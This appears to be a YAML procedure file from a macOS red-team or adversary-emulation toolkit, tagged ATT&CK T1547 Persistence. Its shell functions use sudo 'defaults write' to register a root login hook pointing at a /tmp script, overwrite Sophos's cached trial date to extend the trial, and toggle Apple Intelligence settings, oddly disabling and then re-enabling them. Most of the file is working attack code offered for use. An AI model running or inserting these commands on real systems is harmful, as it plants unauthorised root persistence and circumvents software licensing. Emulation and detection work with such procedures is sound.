procedure_name: modify_preferences
ttp_id: T1547
tactic: Persistence
guid: 3b366584-63de-4b56-87fa-46eb2dd0f1e5
intent: Establish persistence by modifying system login preferences and extending
  application trial periods using defaults write commands
author: '@darmado | https://x.com/darmad0'
version: 1.0.4
created: '2025-01-27'
updated: '2025-06-03'
procedure:
  arguments:
  - option: --login-hook
    description: Set login hook for persistence
    type: string
    execute_function:
    - set_login_hook
  - option: --extend-sophos
    description: Extend Sophos trial cache date
    execute_function:
    - extend_sophos_trial
  - option: --ai-manipulation
    description: Manipulate Apple Intelligence settings
    execute_function:
    - manipulate_ai_settings
  - option: --check-persistence
    description: Check current persistence mechanisms
    execute_function:
    - check_persistence_status
  global_variable:
  - name: CMD_DEFAULTS
    type: string
    default_value: defaults
  - name: CMD_SUDO
    type: string
    default_value: sudo
  - name: DEFAULT_HOOK_PATH
    type: string
    default_value: /tmp/gain_persistence.sh
  - name: SOPHOS_TRIAL_DATE
    type: string
    default_value: 2026-05-30 08:46:00 +0000
  functions:
  - name: set_login_hook
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      set_login_hook() {
          $CMD_PRINTF "PERSISTENCE_TYPE|COMMAND|RESULT\n"
          
          # Use provided path or default
          local hook_path="${INPUT_LOGIN_HOOK:-$DEFAULT_HOOK_PATH}"
          
          # Set login hook
          local result
          result=$($CMD_SUDO $CMD_DEFAULTS write /Library/Preferences/com.apple.loginwindow LoginHook "$hook_path" 2>&1)
          $CMD_PRINTF "LOGIN_HOOK|sudo defaults write /Library/Preferences/com.apple.loginwindow LoginHook|%s\n" "$result"
          
          return 0
      }
  - name: extend_sophos_trial
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      extend_sophos_trial() {
          $CMD_PRINTF "PERSISTENCE_TYPE|COMMAND|RESULT\n"
          
          # Read current Sophos trial date
          local current_date
          current_date=$($CMD_DEFAULTS read com.sophos.ipm cacheDate 2>/dev/null)
          $CMD_PRINTF "SOPHOS_CURRENT|defaults read com.sophos.ipm cacheDate|%s\n" "$current_date"
          
          # Extend Sophos trial cache date
          local result
          result=$($CMD_DEFAULTS write com.sophos.ipm cacheDate "$SOPHOS_TRIAL_DATE" 2>&1)
          $CMD_PRINTF "SOPHOS_EXTEND|defaults write com.sophos.ipm cacheDate|%s\n" "$result"
          
          return 0
      }
  - name: manipulate_ai_settings
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      manipulate_ai_settings() {
          $CMD_PRINTF "PERSISTENCE_TYPE|COMMAND|RESULT\n"
          
          # Disable Apple Intelligence
          local disable_result
          disable_result=$($CMD_DEFAULTS write com.apple.CloudSubscriptionFeatures.optIn 545129924 -bool false 2>&1)
          $CMD_PRINTF "AI_DISABLE|defaults write com.apple.CloudSubscriptionFeatures.optIn 545129924 -bool false|%s\n" "$disable_result"
          
          # Enable Apple Intelligence
          local enable_result
          enable_result=$($CMD_DEFAULTS write com.apple.CloudSubscriptionFeatures.optIn 545129924 -bool true 2>&1)
          $CMD_PRINTF "AI_ENABLE|defaults write com.apple.CloudSubscriptionFeatures.optIn 545129924 -bool true|%s\n" "$enable_result"
          
          return 0
      }
  - name: check_persistence_status
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      check_persistence_status() {
          $CMD_PRINTF "PERSISTENCE_TYPE|COMMAND|RESULT\n"
          
          # Check login hook
          local login_hook
          login_hook=$($CMD_SUDO $CMD_DEFAULTS read /Library/Preferences/com.apple.loginwindow LoginHook 2>/dev/null)
          $CMD_PRINTF "LOGIN_HOOK_CHECK|sudo defaults read /Library/Preferences/com.apple.loginwindow LoginHook|%s\n" "$login_hook"
          
          # Check Sophos trial date
          local sophos_date
          sophos_date=$($CMD_DEFAULTS read com.sophos.ipm cacheDate 2>/dev/null)
          $CMD_PRINTF "SOPHOS_DATE_CHECK|defaults read com.sophos.ipm cacheDate|%s\n" "$sophos_date"
          
          # Check AI settings
          local ai_setting
          ai_setting=$($CMD_DEFAULTS read com.apple.CloudSubscriptionFeatures.optIn 545129924 2>/dev/null)
          $CMD_PRINTF "AI_SETTING_CHECK|defaults read com.apple.CloudSubscriptionFeatures.optIn 545129924|%s\n" "$ai_setting"
          
          return 0
      }
